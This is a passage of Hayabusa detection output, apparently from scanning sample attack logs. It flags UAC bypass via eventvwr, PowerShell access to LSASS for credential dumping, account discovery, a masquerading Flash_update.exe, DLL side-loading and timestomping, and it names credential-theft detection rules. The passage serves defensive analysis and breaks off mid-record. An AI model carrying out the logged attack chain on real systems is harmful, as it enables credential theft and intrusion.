Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\eventvwr.exe"" | LID: 0xca21 | PID: 3900 | PGUID: 365ABB72-AC60-5CB8-0000-001037BA0800 | Hash: SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:57:06.954 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,undefined | Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 912 | PGUID: 365ABB72-AB26-5CB8-0000-0010D1AE0000,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:57:52.910 +09:00,IEWIN7,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1031,technique_name=Modify Existing Service | tcp | Src: fe80:0:0:0:80ac:4126:fa58:1b81:49158 (IEWIN7) | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:135 (IEWIN7) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 3900 | PGUID: 365ABB72-AC60-5CB8-0000-001037BA0800",rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:12.979 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\cryptdll.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 
Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:13.389 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\samlib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:13.650 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\hid.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:13.740 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon 
Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\WinSCard.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1C4EA79DABE347BA378654FD2C6EE51B3C7B2868,MD5=9419ABF3163B6F0E3AD3DD2B381C879F,SHA256=75029AFDB5F8A8F74A63B6C8165E77110E2FBAEC0021A9613035BFFEC646A54E,IMPHASH=C9D7A0D2005B11C675EA66DFAC2C77E9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,,Process Access_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 1200 | Src PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Tgt PID: 472 | Tgt PGUID: 365ABB72-29B3-5CB9-0000-001087490000",rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.871 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\vaultcli.dll | Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: Powershell | LID: 0xca21 | PID: 3980 | PGUID: 365ABB72-AD19-5CB8-0000-0010F4F40C00 | Hash: SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:34.168 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\cryptdll.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: 
Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:34.448 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\samlib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:34.659 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\hid.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:34.689 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon 
Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\WinSCard.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1C4EA79DABE347BA378654FD2C6EE51B3C7B2868,MD5=9419ABF3163B6F0E3AD3DD2B381C879F,SHA256=75029AFDB5F8A8F74A63B6C8165E77110E2FBAEC0021A9613035BFFEC646A54E,IMPHASH=C9D7A0D2005B11C675EA66DFAC2C77E9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.680 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\vaultcli.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,,Process Access_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 1200 | Src PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Tgt PID: 472 | Tgt PGUID: 365ABB72-29B3-5CB9-0000-001087490000",rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 
02:01:35.720 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:49.961 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\wlanapi.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1624 | PGUID: 365ABB72-AB28-5CB8-0000-001025060100 | Hash: SHA1=31E713AFCF973171D9A3B0B616F4726CD3CFE621,MD5=837E870DBDEE3D19122C833389D81CC9,SHA256=4C4410B103A80D9502E6842033BBDA2952C219824DCCA75EEB8265C94A53FBC4,IMPHASH=6C6D0BFAB9C996952B5E81BA61DB929E",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:03:03.321 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,"technique_id=T1187,technique_name=Forced Authentication | Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | PID: 1388 | PGUID: 365ABB72-AB28-5CB8-0000-0010F2E20000",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:03:03.441 +09:00,IEWIN7,11,medium,,File Created_Sysmon Alert,"technique_id=T1187,technique_name=Forced Authentication | Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\HTools (vboxsrv) (D).lnk | Process: C:\Windows\Explorer.EXE | PID: 1388 | PGUID: 
365ABB72-AB28-5CB8-0000-0010F2E20000",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-28 00:57:25.868 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\Downloads\Flash_update.exe | Process: C:\Windows\Explorer.EXE | PID: 2772 | PGUID: 365ABB72-7ACC-5CC4-0000-0010B2470300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:27.087 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 944 | PGUID: 365ABB72-7AB0-5CC4-0000-0010C5BE0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | Process: C:\Users\IEUser\Downloads\Flash_update.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf4be | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=B4E581F173F782A2F1DA5D29C95946EE500EB2D0,MD5=42893ADBC36605EC79B5BD610759947E,SHA256=1A061C74619DE6AF8C02CBA0FA00754BDD9E3515C0E08CAD6350C7ADFC8CDD5B,IMPHASH=40BEC1A4A3BCB7D3089B5E1532386613",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Exec,Suspicious File Characteristics Due to Missing 
Fields,,rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.587 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Windows\System32\winmm.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=41905C387FA657D91DA8A743ABC04B6C11A38B52,MD5=D5AEFAD57C08349A4393D987DF7C715D,SHA256=C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201,IMPHASH=1A7210F2C9930AF9B51025300C67DA77",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-04 16:29:27.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.634 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-04 16:29:27.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.634 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.650 +09:00,IEWIN7,2,low,Evas,Possible 
Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll.url | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-05 17:50:28.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.650 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.650 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.650 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.650 +09:00,IEWIN7,2,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.650 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe 
| Company: ? | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | LID: 0xf4be | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: ? 
| Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.837 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=6474D0369F97E72E01E4971128D1062F5C2B3656,MD5=09B8B54F78A10C435CD319070AA13C28,SHA256=523D28DF917F9D265CD2C0D38DF26277BC56A535145100ED82E6F5FDEAAE7256,IMPHASH=DF7251FDCE5E0D0813311EC9D52FDE93",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.853 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=4E14894860034FEFBAB41CFE9A763D8061D19EF9,MD5=2D8FB1F82724CF542CD2E3A5E041FB52,SHA256=ECE29E4AF4B33C02DAFAC24748A9C125B057E39455ACF3C45464DB36BFE74881,IMPHASH=9599F61759CDFD742AFA0B8EC24B5599",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.853 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Windows\System32\winmm.dll | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2992 | PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Hash: SHA1=41905C387FA657D91DA8A743ABC04B6C11A38B52,MD5=D5AEFAD57C08349A4393D987DF7C715D,SHA256=C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201,IMPHASH=1A7210F2C9930AF9B51025300C67DA77",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.868 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Company: ? 
